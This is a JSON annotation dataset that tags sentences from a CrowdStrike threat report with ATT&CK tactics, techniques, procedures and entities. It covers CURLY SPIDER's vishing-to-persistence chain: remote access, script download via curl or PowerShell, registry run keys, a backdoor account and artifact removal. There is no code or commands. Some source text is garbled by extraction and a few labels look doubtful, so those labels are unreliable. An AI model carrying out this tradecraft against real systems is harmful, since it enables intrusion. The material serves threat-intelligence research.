CRANE ROK (REPUBLIC OF KOREA)", "sentence_text": "HAWK SYRIA NAMING JACKAL HACKTIVIST KITTEN IRAN LEOPARD PAKISTAN LYNX GEORGIA OCELOT COLOMBIA PANDA PEOPLE’S REPUBLIC OF CHINA SAIGA KAZAKHSTAN SPHINX EGYPT SPIDER eCRIME TIGER INDIA WOLF TURKEY", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p9-s62-64fd72", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 9, "sentence_id": 62, "context_before": "HAWK SYRIA NAMING JACKAL HACKTIVIST KITTEN IRAN LEOPARD PAKISTAN LYNX GEORGIA OCELOT COLOMBIA PANDA PEOPLE’S REPUBLIC OF CHINA SAIGA KAZAKHSTAN SPHINX EGYPT SPIDER eCRIME TIGER INDIA WOLF TURKEY", "sentence_text": "As organizations work to strengthen their defenses, adversaries target their weaknesses: employees susceptible to social engineering and systems lacking modern security controls.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p9-s63-cdfe73", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 9, "sentence_id": 63, "context_before": "As organizations work to strengthen their defenses, adversaries target their weaknesses: employees susceptible to social engineering and systems lacking modern security controls.", "sentence_text": "00:51\nChina-nexus activity surged Vishing attacks skyrocketed Average eCrime breakout 79% of detections in 2024 150% across all sectors, with a 442% between the first and time dropped to 48 minutes, were malware-free, up from staggering 200-300% increase second half of 2024 with the fastest breakout 40% in 2019 in key targeted industries observed at just 51 seconds", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p9-s64-3fbf71", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 9, "sentence_id": 64, "context_before": "00:51\nChina-nexus activity surged Vishing attacks skyrocketed Average eCrime breakout 79% of detections in 2024 150% across all sectors, with a 442% between the first and time dropped to 48 minutes, were malware-free, up from staggering 200-300% increase second half of 2024 with the fastest breakout 40% in 2019 in key targeted industries observed at just 51 seconds", "sentence_text": "Access broker advertisements Valid account abuse accounted 52% of vulnerabilities observed 26 new adversaries tracked by increased 50% year-over-year for 35% of cloud incidents by CrowdStrike in 2024 were CrowdStrike, raising the total related to initial access to 257", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p10-s65-9afdea", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 10, "sentence_id": 65, "context_before": "Access broker advertisements Valid account abuse accounted 52% of vulnerabilities observed 26 new adversaries tracked by increased 50% year-over-year for 35% of cloud incidents by CrowdStrike in 2024 were CrowdStrike, raising the total related to initial access to 257", "sentence_text": "The Growing Reliance on Identity Attacks and Vulnerability Exploits MONTH 2024 Every breach starts with initial access, and identity-based attacks are among the most effective entry methods.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p10-s67-3548d8", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 10, "sentence_id": 67, "context_before": "MARCH 242", "sentence_text": "A major driver behind this shift is the rise of access APRIL 186 brokers: specialists who acquire access to organizations and sell it to other threat actors, including ransomware MAY 813 operators.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p10-s69-19aa97", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 10, "sentence_id": 69, "context_before": "JUNE 201", "sentence_text": "SEPTEMBER 253\nBut identity isn’t the only target — adversaries are also exploiting vulnerabilities to gain initial access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p10-s70-03353f", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 10, "sentence_id": 70, "context_before": "SEPTEMBER 253\nBut identity isn’t the only target — adversaries are also exploiting vulnerabilities to gain initial access.", "sentence_text": "In 2024, OCTOBER 386 52% of observed vulnerabilities were linked to initial access, reinforcing the need to secure exposed NOVEMBER 328 systems before attackers establish a foothold.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p10-s72-575827", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 10, "sentence_id": 72, "context_before": "DECEMBER 853", "sentence_text": "As adversaries scale identity-based attacks and vulnerability exploitation, organizations must adopt TOTAL 4,486 proactive defense strategies, including identity verification, risk-based patching, and early detection of credential abuse, to disrupt adversary operations Figure 1.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p10-s73-c9e177", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 10, "sentence_id": 73, "context_before": "As adversaries scale identity-based attacks and vulnerability exploitation, organizations must adopt TOTAL 4,486 proactive defense strategies, including identity verification, risk-based patching, and early detection of credential abuse, to disrupt adversary operations Figure 1.", "sentence_text": "Access broker advertisements by month, 2024 before they escalate.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p10-s74-470687", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 10, "sentence_id": 74, "context_before": "Access broker advertisements by month, 2024 before they escalate.", "sentence_text": "The Continued Rise of Interactive Intrusions Modern cyber threats are increasingly dominated by “interactive intrusion” techniques, where adversaries execute hands-on-keyboard actions to achieve objectives.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p10-s75-077bc0", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 10, "sentence_id": 75, "context_before": "The Continued Rise of Interactive Intrusions Modern cyber threats are increasingly dominated by “interactive intrusion” techniques, where adversaries execute hands-on-keyboard actions to achieve objectives.", "sentence_text": "In 2024, CrowdStrike observed a 35% year-over-year increase in interactive intrusion campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p10-s76-45f344", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 10, "sentence_id": 76, "context_before": "In 2024, CrowdStrike observed a 35% year-over-year increase in interactive intrusion campaigns.", "sentence_text": "The charts on the following page reflect the relative frequency of intrusions in the top geographical regions and industry verticals.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p11-s77-e2c340", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 11, "sentence_id": 77, "context_before": "The charts on the following page reflect the relative frequency of intrusions in the top geographical regions and industry verticals.", "sentence_text": "Top 10 Industries Targeted by Interactive Intrusions 23% 15% 12% 11% 10% 9% 7% 6% 4% 3% TECHNOLOGY CONSULTING AND MANUFACTURING RETAIL FINANCIAL SERVICES HEALTHCARE TELECOMMUNICATIONS GOVERNMENT INDUSTRIALS AND ACADEMIC PROFESSIONAL SERVICES ENGINEERING 79% 75% 71% 62% These statistics highlight the global reach 51% of adversary operations and the necessity for cross-domain security strategies that account 40% for identity compromise, lateral movement, and cloud-based attack vectors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p11-s78-78c49d", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 11, "sentence_id": 78, "context_before": "Top 10 Industries Targeted by Interactive Intrusions 23% 15% 12% 11% 10% 9% 7% 6% 4% 3% TECHNOLOGY CONSULTING AND MANUFACTURING RETAIL FINANCIAL SERVICES HEALTHCARE TELECOMMUNICATIONS GOVERNMENT INDUSTRIALS AND ACADEMIC PROFESSIONAL SERVICES ENGINEERING 79% 75% 71% 62% These statistics highlight the global reach 51% of adversary operations and the necessity for cross-domain security strategies that account 40% for identity compromise, lateral movement, and cloud-based attack vectors.", "sentence_text": "This shift toward malware-free attack techniques has been a defining trend over the past five years.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p12-s79-8808f9", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 12, "sentence_id": 79, "context_before": "This shift toward malware-free attack techniques has been a defining trend over the past five years.", "sentence_text": "Breakout Time: The Race Against Adversaries Once adversaries gain initial access, their next objective is to “break out” and move laterally from the initial foothold to high-value assets.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p12-s80-e162f2", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 12, "sentence_id": 80, "context_before": "Breakout Time: The Race Against Adversaries Once adversaries gain initial access, their next objective is to “break out” and move laterally from the initial foothold to high-value assets.", "sentence_text": "The speed of this “breakout time” determines how fast a defender must respond to reduce the costs and damages associated with an intrusion.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p12-s81-6c3ac6", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 12, "sentence_id": 81, "context_before": "The speed of this “breakout time” determines how fast a defender must respond to reduce the costs and damages associated with an intrusion.", "sentence_text": "Alarmingly, the fastest breakout was recorded at just 51 seconds — meaning defenders may have less than a minute to detect and respond before attackers establish deeper control.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p12-s82-ff0f20", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 12, "sentence_id": 82, "context_before": "Alarmingly, the fastest breakout was recorded at just 51 seconds — meaning defenders may have less than a minute to detect and respond before attackers establish deeper control.", "sentence_text": "In this case, the adversary attempted to achieve their objectives without even needing to break out to another device.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p12-s83-a22741", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 12, "sentence_id": 83, "context_before": "In this case, the adversary attempted to achieve their objectives without even needing to break out to another device.", "sentence_text": "The entire attack chain — from initial user interaction and social engineering to introducing a backdoor account to establish persistence — took under four minutes.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1136", "name": "Create Account" } ], "procedure": "Adversary uses social engineering to interact with a user and introduces a backdoor account to establish persistent access.", "entities": [ { "text": "social engineering", "start": 60, "end": 78, "label": "Action" }, { "text": "introducing a backdoor account to establish persistence", "start": 82, "end": 137, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p12-s84-d983e6", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 12, "sentence_id": 84, "context_before": "The entire attack chain — from initial user interaction and social engineering to introducing a backdoor account to establish persistence — took under four minutes.", "sentence_text": "This incident would have been prevented by the CrowdStrike Falcon sensor with proper prevention policies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p12-s85-157014", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 12, "sentence_id": 85, "context_before": "This incident would have been prevented by the CrowdStrike Falcon sensor with proper prevention policies.", "sentence_text": "How CURLY SPIDER Operates This adversary relies heavily on social engineering for initial access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p12-s86-751577", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 12, "sentence_id": 86, "context_before": "How CURLY SPIDER Operates This adversary relies heavily on social engineering for initial access.", "sentence_text": "In some cases, the following will occur:\n•", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p13-s87-7df73d", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 13, "sentence_id": 87, "context_before": "In some cases, the following will occur:\n•", "sentence_text": "CURLY CrowdStrike OverWatch in Action:\nStopping a Social Engineering Attack in Under 4 Minutes SPIDER Spam Gains Validates Uses Runs Deploys Bombing REMOTE ACCESS TO CONNECTION CURL TO SCRIPTS TO SET BACKDOOR QUICK ASSIST TO ADVERSARY- DOWNLOAD REGISTRY RUN USER CONTROLLED MALICIOUS KEYS AND REMOVE INFRASTRUCTURE SCRIPTS ARTIFACTS Adversary +3:43 +0:06 +0:06 CROWDSTRIKESTOP OVERWATCH Vishing Call BLOCKSIDENTIFIESBACKDOORAND ACCOUNT to stop a social engineering attack in less than four minutes Once CURLY SPIDER gains initial access, their window of opportunity is limited — access will only last as long as the victim remains on the call.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p13-s88-7de6b0", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 13, "sentence_id": 88, "context_before": "CURLY CrowdStrike OverWatch in Action:\nStopping a Social Engineering Attack in Under 4 Minutes SPIDER Spam Gains Validates Uses Runs Deploys Bombing REMOTE ACCESS TO CONNECTION CURL TO SCRIPTS TO SET BACKDOOR QUICK ASSIST TO ADVERSARY- DOWNLOAD REGISTRY RUN USER CONTROLLED MALICIOUS KEYS AND REMOVE INFRASTRUCTURE SCRIPTS ARTIFACTS Adversary +3:43 +0:06 +0:06 CROWDSTRIKESTOP OVERWATCH Vishing Call BLOCKSIDENTIFIESBACKDOORAND ACCOUNT to stop a social engineering attack in less than four minutes Once CURLY SPIDER gains initial access, their window of opportunity is limited — access will only last as long as the victim remains on the call.", "sentence_text": "To extend control, the adversary’s immediate objective is to establish persistent access before the session ends.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p13-s89-5210ae", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 13, "sentence_id": 89, "context_before": "To extend control, the adversary’s immediate objective is to establish persistent access before the session ends.", "sentence_text": "With remote access secured, CURLY SPIDER moves quickly — often while still actively engaging with the victim — to deploy their payloads and establish persistence.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1053", "name": "Scheduled Task/Job" } ], "procedure": "CURLY SPIDER deploys payloads after gaining remote access and establishes persistence while interacting with the victim.", "entities": [ { "text": "CURLY SPIDER", "start": 28, "end": 40, "label": "ThreatActor" }, { "text": "moves quickly — often while still actively engaging with the victim — to deploy their payloads", "start": 41, "end": 135, "label": "Action" }, { "text": "establish persistence", "start": 140, "end": 161, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p13-s90-bb2591", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 13, "sentence_id": 90, "context_before": "With remote access secured, CURLY SPIDER moves quickly — often while still actively engaging with the victim — to deploy their payloads and establish persistence.", "sentence_text": "The bulk of the intrusion time is spent ensuring connectivity and troubleshooting any access issues to reach their cloud-hosted malicious scripts.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "The adversary ensures connectivity and troubleshoots access issues in order to reach cloud-hosted malicious scripts used in the intrusion.", "entities": [ { "text": "ensuring connectivity", "start": 40, "end": 61, "label": "Action" }, { "text": "troubleshooting any access issues to reach their cloud-hosted malicious scripts", "start": 66, "end": 145, "label": "Action" }, { "text": "cloud-hosted malicious scripts", "start": 115, "end": 145, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p13-s92-30581e", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 13, "sentence_id": 92, "context_before": "›", "sentence_text": "The adversary ensures a connection to pre-configured cloud storage, where they host malicious scripts and work through any access barriers.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "The adversary connects to pre-configured cloud storage that hosts malicious scripts and works through access barriers to reach them.", "entities": [ { "text": "The adversary", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "ensures a connection to pre-configured cloud storage", "start": 14, "end": 66, "label": "Action" }, { "text": "pre-configured cloud storage", "start": 38, "end": 66, "label": "Infrastructure_Indicator" }, { "text": "host malicious scripts", "start": 79, "end": 101, "label": "Action" }, { "text": "malicious scripts", "start": 84, "end": 101, "label": "MalwareTool" }, { "text": "work through any access barriers", "start": 106, "end": 138, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p13-s93-147c24", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 13, "sentence_id": 93, "context_before": "The adversary ensures a connection to pre-configured cloud storage, where they host malicious scripts and work through any access barriers.", "sentence_text": "Once access is confirmed, CURLY SPIDER downloads malicious scripts.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "CURLY SPIDER downloads malicious scripts after confirming access to the target environment.", "entities": [ { "text": "CURLY SPIDER", "start": 26, "end": 38, "label": "ThreatActor" }, { "text": "downloads malicious scripts", "start": 39, "end": 66, "label": "Action" }, { "text": "malicious scripts", "start": 49, "end": 66, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p13-s94-cdde16", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 13, "sentence_id": 94, "context_before": "Once access is confirmed, CURLY SPIDER downloads malicious scripts.", "sentence_text": "Deploying Payload (0:06)\n› CURLY SPIDER executes the scripts via curl or PowerShell.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.001", "name": "Command and Scripting Interpreter: PowerShell" }, { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "CURLY SPIDER executes malicious scripts using curl or PowerShell.", "entities": [ { "text": "CURLY SPIDER", "start": 27, "end": 39, "label": "ThreatActor" }, { "text": "executes the scripts via curl or PowerShell", "start": 40, "end": 83, "label": "Action" }, { "text": "scripts", "start": 53, "end": 60, "label": "MalwareTool" }, { "text": "PowerShell", "start": 73, "end": 83, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p13-s95-82d024", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 13, "sentence_id": 95, "context_before": "Deploying Payload (0:06)\n› CURLY SPIDER executes the scripts via curl or PowerShell.", "sentence_text": "These scripts:\n• Modify registry run keys, creating a user to ensure execution at startup • Remove forensic artifacts to erase traces of the intrusion 3.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1547.001", "name": "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" }, { "id": "T1070", "name": "Indicator Removal on Host" } ], "procedure": "Scripts modify registry run keys to ensure execution at startup and remove forensic artifacts to erase traces of the intrusion.", "entities": [ { "text": "scripts", "start": 6, "end": 13, "label": "MalwareTool" }, { "text": "Modify registry run keys", "start": 17, "end": 41, "label": "Action" }, { "text": "registry run keys", "start": 24, "end": 41, "label": "Infrastructure_Indicator" }, { "text": "Remove forensic artifacts to erase traces of the intrusion", "start": 92, "end": 150, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p13-s96-f923d4", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 13, "sentence_id": 96, "context_before": "These scripts:\n• Modify registry run keys, creating a user to ensure execution at startup • Remove forensic artifacts to erase traces of the intrusion 3.", "sentence_text": "Establishing Persistent Access (0:06)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p13-s98-310c85", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 13, "sentence_id": 98, "context_before": "›", "sentence_text": "The adversary creates a backdoor user, embedding persistence directly into the system.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1136", "name": "Create Account" } ], "procedure": "The adversary creates a backdoor user account to maintain persistent access on the system.", "entities": [ { "text": "The adversary", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "creates a backdoor user", "start": 14, "end": 37, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p13-s100-110c51", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 13, "sentence_id": 100, "context_before": "›", "sentence_text": "The final payload is executed under a legitimate binary, allowing CURLY SPIDER to blend into normal activity and evade detection.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" }, { "id": "T1218", "name": "Signed Binary Proxy Execution" } ], "procedure": "CURLY SPIDER executes the final payload under a legitimate binary to blend into normal system activity and evade detection.", "entities": [ { "text": "CURLY SPIDER", "start": 66, "end": 78, "label": "ThreatActor" }, { "text": "executed under a legitimate binary", "start": 21, "end": 55, "label": "Action" }, { "text": "legitimate binary", "start": 38, "end": 55, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p13-s101-952f87", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 13, "sentence_id": 101, "context_before": "The final payload is executed under a legitimate binary, allowing CURLY SPIDER to blend into normal activity and evade detection.", "sentence_text": "In this example, CURLY SPIDER does not rely on traditional “breakout” techniques to move laterally.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p13-s102-4a9d80", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 13, "sentence_id": 102, "context_before": "In this example, CURLY SPIDER does not rely on traditional “breakout” techniques to move laterally.", "sentence_text": "Instead, the adversary compromises the network in seconds by securing long-term access before the victim even realizes what’s happening.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p14-s103-a842a2", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 14, "sentence_id": 103, "context_before": "Instead, the adversary compromises the network in seconds by securing long-term access before the victim even realizes what’s happening.", "sentence_text": "Impact and Connection to Ransomware In this case, CURLY SPIDER was stopped by CrowdStrike OverWatch before they could proceed with the rest of their attack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p14-s104-9ad506", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 14, "sentence_id": 104, "context_before": "Impact and Connection to Ransomware In this case, CURLY SPIDER was stopped by CrowdStrike OverWatch before they could proceed with the rest of their attack.", "sentence_text": "Proactive Defense Is Essential Adversaries are refining their tactics to move faster and exploiting trusted access to bypass traditional defenses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p14-s105-447e77", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 14, "sentence_id": 105, "context_before": "Proactive Defense Is Essential Adversaries are refining their tactics to move faster and exploiting trusted access to bypass traditional defenses.", "sentence_text": "Security teams must:\n› Prioritize identity protection to prevent unauthorized access › Harden cloud environments against credential abuse and address misconfigurations › Accelerate response times to counter rapid breakout events › Leverage AI-driven threat hunting to detect stealthy adversary movements InIn 2025,2025, attackersattackers willwill onlyonly movemove faster.faster.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p14-s106-fba7ae", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 14, "sentence_id": 106, "context_before": "Security teams must:\n› Prioritize identity protection to prevent unauthorized access › Harden cloud environments against credential abuse and address misconfigurations › Accelerate response times to counter rapid breakout events › Leverage AI-driven threat hunting to detect stealthy adversary movements InIn 2025,2025, attackersattackers willwill onlyonly movemove faster.faster.", "sentence_text": "WillWill defendersdefenders keepkeep up?up?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p15-s107-d25a0e", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 15, "sentence_id": 107, "context_before": "WillWill defendersdefenders keepkeep up?up?", "sentence_text": "KeyKey AdversaryAdversary\nThemesThemes\nTHE BUSINESS OF SOCIAL ENGINEERING Since 2023, eCrime and targeted intrusion adversaries have increasingly used identity compromise and other human-centric tradecraft to gain initial access and perform lateral movement.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p15-s108-a246f5", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 15, "sentence_id": 108, "context_before": "KeyKey AdversaryAdversary\nThemesThemes\nTHE BUSINESS OF SOCIAL ENGINEERING Since 2023, eCrime and targeted intrusion adversaries have increasingly used identity compromise and other human-centric tradecraft to gain initial access and perform lateral movement.", "sentence_text": "The emergence of this tactic is partly driven by the growing efficacy and abundance of modern host-based security tools such as endpoint detection and response (EDR) solutions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p15-s109-fe7bfa", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 15, "sentence_id": 109, "context_before": "The emergence of this tactic is partly driven by the growing efficacy and abundance of modern host-based security tools such as endpoint detection and response (EDR) solutions.", "sentence_text": "These factors have driven social engineering activity in which threat actors attempt to access targeted accounts or persuade legitimate employees to provide remote access to targeted systems.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Threat actors use social engineering to access targeted accounts or convince employees to provide remote access to systems.", "entities": [ { "text": "threat actors", "start": 63, "end": 76, "label": "ThreatActor" }, { "text": "attempt to access targeted accounts", "start": 77, "end": 112, "label": "Action" }, { "text": "persuade legitimate employees to provide remote access to targeted systems", "start": 116, "end": 190, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p15-s110-9505c8", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 15, "sentence_id": 110, "context_before": "These factors have driven social engineering activity in which threat actors attempt to access targeted accounts or persuade legitimate employees to provide remote access to targeted systems.", "sentence_text": "In 2024, CrowdStrike Intelligence observed a massive increase in the number of distinct campaigns using telephone-oriented social engineering techniques to gain initial access, including vishing and help desk social engineering, marking a potential shift in the eCrime ecosystem.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p15-s111-8ef07d", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 15, "sentence_id": 111, "context_before": "In 2024, CrowdStrike Intelligence observed a massive increase in the number of distinct campaigns using telephone-oriented social engineering techniques to gain initial access, including vishing and help desk social engineering, marking a potential shift in the eCrime ecosystem.", "sentence_text": "2024 Vishing Trends Several eCrime adversaries incorporated vishing into their intrusions in 2024, amounting to a 40% compounded monthly growth rate in observed vishing operations for the year.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p15-s112-0cca25", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 15, "sentence_id": 112, "context_before": "2024 Vishing Trends Several eCrime adversaries incorporated vishing into their intrusions in 2024, amounting to a 40% compounded monthly growth rate in observed vishing operations for the year.", "sentence_text": "The latter half of 2024 saw a significant increase in the use of this tactic (Figure 6).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p15-s113-a38709", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 15, "sentence_id": 113, "context_before": "The latter half of 2024 saw a significant increase in the use of this tactic (Figure 6).", "sentence_text": "WHY VISHING IS SO EFFECTIVE Similar to other social engineering techniques, vishing is effective because it targets human weakness or error rather than a flaw in software or an operating system (OS).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p15-s114-331407", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 15, "sentence_id": 114, "context_before": "WHY VISHING IS SO EFFECTIVE Similar to other social engineering techniques, vishing is effective because it targets human weakness or error rather than a flaw in software or an operating system (OS).", "sentence_text": "This gives the threat actor an advantage and puts the onus on users to recognize potentially malicious behavior.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p16-s116-df52ae", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 16, "sentence_id": 116, "context_before": "JUL AUG SEP", "sentence_text": "OCT NOV DEC 442% Increase, H1 vs. H2 2024 In vishing campaigns, threat actors call targeted users and attempt to persuade them to download malicious payloads, establish remote support sessions, or enter their credentials to adversary-in-the-middle (AITM)\nphishing pages.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1566.002", "name": "Spearphishing via Service" }, { "id": "T1189", "name": "Drive-by Compromise" } ], "procedure": "Threat actors conduct vishing campaigns by calling users and persuading them to download malicious 